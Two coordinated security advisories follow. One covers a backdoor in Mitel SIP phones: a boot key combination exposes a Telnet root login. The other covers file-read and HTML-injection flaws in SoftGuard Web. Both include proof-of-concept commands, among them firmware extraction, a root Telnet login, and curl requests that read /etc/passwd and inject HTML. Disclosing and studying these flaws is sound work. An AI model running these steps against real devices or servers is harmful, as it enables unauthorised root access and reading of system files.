<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-021 Product: Mitel 6800/6900 Series SIP Phones excluding 6970 Mitel 6900 Series IP (MiNet) Phones Manufacturer: Mitel Networks Corporation Affected Version(s): Rel 5.1 SP8 (5.1.0.8016) and earlier Rel 6.0 (6.0.0.368) to 6.1 HF4 (6.1.0.165) MiNet 1.8.0.12 and earlier Tested Version(s): 6.1.0.146 Vulnerability Type: Hidden Functionality (Backdoor) (CWE-912) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2022-02-23 Solution Date: 2022-05-03 Public Disclosure: 2022-06-10 CVE Reference: CVE-2022-29854 CVE-2022-29855 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Mitel Networks Corporation manufactures different IP- and SIP-based desk phones. The manufacturer describes these products, e.g., as follows: "The 6900 IP Series is a powerful suite of desk phones with crystal clear audio, advanced features and a broad array of accessories to improve productivity and mobility in today's modern business environment." The firmware of several phones contains an undocumented backdoor which allows an attacker to gain root access by pressing specific keys on system boot. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The shell script "check_mft.sh", which is located in the directory "/etc" on the phone, checks whether the keys "*" and "#" are pressed simultaneously during system startup. The phone then sets its IP address to "10.30.102.102" and starts a Telnet server. A Telnet login can then be performed with a static root password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Identify the backdoor 1.1. Extract the jffs2 file system from an affected Mitel firmware: #> binwalk -e 6867i.st DECIMAL HEXADECIMAL DESCRIPTION - -------------------------------------------------------------------------------- 347 0x15B Linux kernel ARM boot executable zImage (little-endian) 15695 0x3D4F gzip compressed data, maximum compression, from Unix, last modified: 2021-10-22 10:47:08 1223395 0x12AAE3 JFFS2 filesystem, little endian 1.2. Mount the jffs2 file system: #> modprobe jffs2 #> modprobe mtdram total_size=70000 #> modprobe mtdblock #> dd if=12AAE3.jffs2 of=/dev/mtdblock0 #> mount -t jffs2 /dev/mtdblock0 /mnt/ 1.3. The script "check_mft.sh" located in the "/etc" directory contains the backdoor logic: #> cat /mnt/etc/check_mft.sh ************* content shortened **************** #!/bin/sh case "$HOSTNAME" in #press and hold * # two keys at the same time "bcm911109_6867i" | "6867i" | "bcm911107_praxis_3" | "bcm911109_aquarius_3") GPIODetect=`gpio get 4` checkDhsgShorted #KEY_OUT0 (GPIO52) -> KEY_IN7 (GPIO50) "DownKey" is press isCCATest=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 017f 01ff 01ff 01ff 01ff 01ff 01ff"` keyBoardScanMatch="True" keycombinationMatch=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 01ff 01ff 01ff 01af 01ff 01ff 01ff"` ;; esac echo "keyBoardScanMatch = $keyBoardScanMatch, dhsgShorted=$dhsgShorted " echo "GPIODetect = $GPIODetect,keycombinationMatch=$keycombinationMatch" echo "isCCATest = $isCCATest" if [ "$keyBoardScanMatch" -a $dhsgShorted -eq 1 -a $GPIODetect -eq "0" -o "$keycombinationMatch" ]; then mount -t jffs2 /dev/mtdblock3 /nvdata if [ -f $ENETCFG ]; then . $ENETCFG MAC=${ENETCFG_MAC} fi /etc/if_bcm_net_setup.sh up ifconfig eth0 hw ether $MAC ifconfig eth0 10.30.102.102 netmask 255.255.255.0 up if [ -f /usr/sbin/telnetd ]; then telnetd & fi exit 255 fi ************* content shortened **************** 1.4. The file "ota_BCM911109_PRAXIS_3_voice_v6_5_jffs2.bin" located in the directory "/etc" contains another jffs2 file system. 1.5. Extract and mount the file system as described in Steps 1 and 2. 1.6. The "check_mft.sh" in this file system also contains the root password which is set by default and forced by the script: #> cat /mnt/etc/check_mft.sh ************* content shortened **************** if [ -f /usr/sbin/telnetd ]; then # make sure the default password is set for root. (echo (password stripped out); sleep 1; echo (password stripped out) | passwd -a A telnetd & fi ************* content shortened **************** 2. Exploiting 2.1. Boot the phone and press the "*" and "#" keys simultaneously. 2.2. Assign an IP address to communicate with the phone: #> ip addr add 10.30.102.100/24 dev eth0 2.3. Now, logging in to the phone as the root user with the static password via Telnet is possible: #> telnet 10.30.102.102 Trying 10.30.102.102... Connected to 10.30.102.102. Escape character is '^]'. (none) login: root Password: 10.30.102.102 # id uid=0(root) gid=0(root) groups=0(root) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Upgrade to one of the following (or later) versions: - - 5.1 SP8 HF1 (5.1.0.8017) - - 6.1 HF5 (6.1.0.171) - - 6.2 SP1 (6.2.0.1012) - - MiNet 1.8.0.15 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-02-22: Vulnerability discovered 2022-02-23: Vulnerability reported to manufacturer 2022-02-24: Acknowledgement of receipt of the vulnerability report received from the manufacturer 2022-03-30: Consultation with the manufacturer regarding updates to fix the vulnerability 2022-03-30: Manufacturer confirms the vulnerability, informs about the status to fix the vulnerability and asks for an extension of the disclosure timeline 2022-03-31: New disclosure date set to 2022-05-10 2022-05-04: Asking the manufacturer for any updates regarding the vulnerability 2022-05-05: Manufacturer provides a patch to fix this vulnerability 2022-05-05: Manufacturer publishes the vulnerability and assigned CVE IDs 2022-05-05: Manufacturer asks for another extension of the disclosure timeline, as large parts of the phones may still be unpatched in practice 2022-05-05: New disclosure date set to 2022-06-10 2022-06-10: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Mitel IP desk phones: https://www.mitel.com/products/devices-accessories/ip-phones-peripherals [2] SySS Responsible Disclosure Policy: https://www.syss.de/en/responsible-disclosure-policy [3] Vulnerability reports by the manufacturer: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0004 https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0003 [4] CVE-2022-29854: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29854 [5] CVE-2022-29855: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29855 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmKaIVcACgkQrgyb+PE0 i1O5fA/9H7onaudE9cqHwqBf0cjdXczlo2e52XXIvcX7NdxQ7HAPuo3kXAeHQCg4 0IlP2MB8rTBLtEJf43ZJhqDuK2J+Q6ypsVrmAzvCBYswsJjFH2SKYkS9cIx3CSaw 35G+J578oYQMex0fZJGK3vYGBPtTIoXhW3Gb4rdG41o6lhKQ3ELF04/9CQTUpKao llCYe3zOhmacnpJ93w5aCenEPqJnrOy0w1bguQN6j43cEnGyv7hVIwW4ukQ4yTvz iBjoRBx89VdjEQKb7g52D6pnORT48vgkDNXZcowofKtD1LZxPz6fC+cuBabSJz41 MFObTqfW9tYTVsBAuqIlQWavp3sy1Jenh/wb9gHILVXupv5flux2ffuKZPyDg6dq dh66GXJaXEX0cWuUax8z6nj6l0nWOcjmbo07Ad1rox8bSOffSvtNRxEgij8tjwPg UpWD6sofHid9BhGWJpyziBRvADDYSakohHZA+GCNONopVwhJdE+RrfOWaD1HV7jn V+RI1ZmB1MYSDHKK11sfYpIFn1qdvF3l0hM0YVjxcy2iNn/cR9ZnId0wtRK4mVhx wx5XBltwHMBREPgNUnqAmsAuAOitt7+vHdVpWA0/0A1vjJnFfdDy2rSiNoDRysrE jp76E0iYjNPWdtJE67Q449Vwk6RINH7C+sSMbAQq5WfY336TyNQ= =jFCk -----END PGP SIGNATURE----- </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220609-0 > ======================================================================= title: Multiple vulnerabilities product: SoftGuard SNMP Network Management Extension vulnerable version: SoftGuard Web (SGW) < 5.1.5 fixed version: SoftGuard version 5.1.5 from 2022-06-01 CVE number: CVE-2022-31201, CVE-2022-31202 impact: High homepage: https://gravitate.eu (reseller) found: 2022-04-14 by: Philipp Espernberger (Office Linz) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- There is no public description available for this vendor/product. The following description was provided as documentation: "SoftGuard is a network management extension which collects inventory-, analysis- and debugging data of devices and networks at least once a day. SoftGuard has an open structure, is built simple, is easily expandable, easy to use and is laid out for large scale networks. The data collection is performed with the protocols SNMP supporting the versions 1, 2c and 3. Additional protocols like ssh, telnet, rsh, https, NetBIOS/IP, ICMP ... complemented by SNMP if required. The SoftGuard Suite consists of three parts: * SoftGuard Network Center (SNC) * SoftGuard Host Center (SHC) * SoftGuard Monitor Center (SMC) Aditionally there are a bunch of common and customer specific expansions like SoftGuard Web (SGW), SoftGuard Statistic Tool (SST), Port Configuration Tool (PCT), Network Access Points (NAP), Technician Access Point (TAP), etc." Business recommendation: ------------------------ SEC Consult recommends to update to the latest version of SoftGuard (network management extension). An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues. Vulnerability overview/description: ----------------------------------- 1) File System Access (CVE-2022-31202) The export function allows authenticated attackers to download any arbitrary local file from the file system due to insufficient input validation. The unfiltered URL parameter query enables an attacker to access arbitrary local files. This allows the attacker to define the complete path and the filename by himself. Files that include passwords and other sensitive information can be accessed. Furthermore, the built-in man functionality also allows attackers to read any arbitrary local file from the file system. 2) HTML Injection (CVE-2022-31201) Various components do not properly sanitize/encode user input. This leads to HTML injection vulnerabilities. By exploiting this vulnerability, an attacker can include arbitrary HTML into the affected web page. The code is executed in the context of the victim's browser when visiting the manipulated URL. The vulnerability can be used to change the contents of the displayed site or redirect to other sites. During the security assessment it was not possible to execute JavaScript code because the security headers Content-Security-Policy and X-Content-Type-Options are preventing the execution. Proof of concept: ----------------- 1) File System Access (CVE-2022-31202) 1a) Export functionality In order to access arbitrary local files, the export function as authenticated user (Administration -> User -> Access -> Export) can be used. The following URL was used to set the filename to /etc/passwd =============================================================================== https://$host:8016/sgw/export?dbs=file&db=DefUser_access_$username_db%2e 1649426888398872%2etmp&query=file%3a/etc/passwd' =============================================================================== The newly set filename (/etc/passwd) can be exported and downloaded via the execution button. Afterwards the content of the file gets downloaded successfully. =============================================================================== root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin [...] =============================================================================== 1b) MAN functionality The following curl command shows how an authenticated attacker can gain access to any arbitrary local file: =============================================================================== curl 'https://$host:8016/cgi-bin/man.tcl' -H 'Authorization: Basic [...]' --data 'act=1&x=%2Fetc%2Fpasswd&submit=Execute' --compressed --insecure =============================================================================== The curl response includes the contents of the file: =============================================================================== <!DOCTYPE html> <html lang="en"><head><meta charset="UTF-8" /> [...] <pre> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin [...] =============================================================================== 2) HTML Injection (CVE-2022-31201) When a new graph is created an authenticated attacker controls the GET parameters and can inject malicious content. The following curl command shows how an authenticated attacker can inject HTML code: =============================================================================== curl 'https://$host:8016/sgw/graph?tbl=sgNode&t=percent&h=Status%3Ch1%3ESEC- Consult%3C/h1%3E+%23&v=%7bdown+1934+orange%7d+%7bicmp+555+red%7d+%7bsnmpaaaa+8723+green%7d&scale=5' -H 'Authorization: Basic [...]' --compressed --insecure =============================================================================== The curl response includes the injected HTML code <h1>SEC Consult</h1>: =============================================================================== <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"/> <title>SGW - Graph: Node</title> [...] </head> <body class="master"> [...] <caption>∑3, Status<h1>SEC Consult</h1>, #11212</caption> [...] <tr><td>Status<h1>SEC Consult</h1></td> [...] </body></html> =============================================================================== Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: * SoftGuard Web (SGW) 5.1.3 The vendor provided the following information regarding the affected versions: 1a) affected version 4.5.0 (2019-05-04) to version 4.5.8 (2020-05-05) 1b) since SoftGuard 2.0 with SoftGuard Web 1.0 (~1998/99) 2) since SoftGuard 3.6.0 (2009-10-31) / SoftGuard 3.6.6 (2011-02-15) with SoftGuard Web 2.6.0/2.6.6 Vendor contact timeline: ------------------------ 2022-05-11: Contacting vendor through direct email address. 2022-05-11: Sent encrypted security advisory to vendor 2022-05-12: Received feedback from the vendor for the security advisory 2022-05-16: Received confirmation that a new version of SoftGuard was already rolled out to the customers which included the fix 2022-05-16: Received additional information which versions are vulnerable 2022-05-19: Received CVE numbers. 2022-05-20: Reviewed the fixed version 5.1.4 and found that HTML injection still works at other endpoints, other issues are fixed. 2022-05-20: Vendor replies that new version 5.1.5. will be released on 1st June. 2022-06-01: Vendor releases patched version 5.1.5. 2022-06-09: Coordinated release of security advisory. Solution: --------- The vendor rolled out new software versions. Affected users should verify that they are using the latest version available (5.1.5 from 2022-06-01 or higher). Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF P. Espernberger / @2022 </code></pre>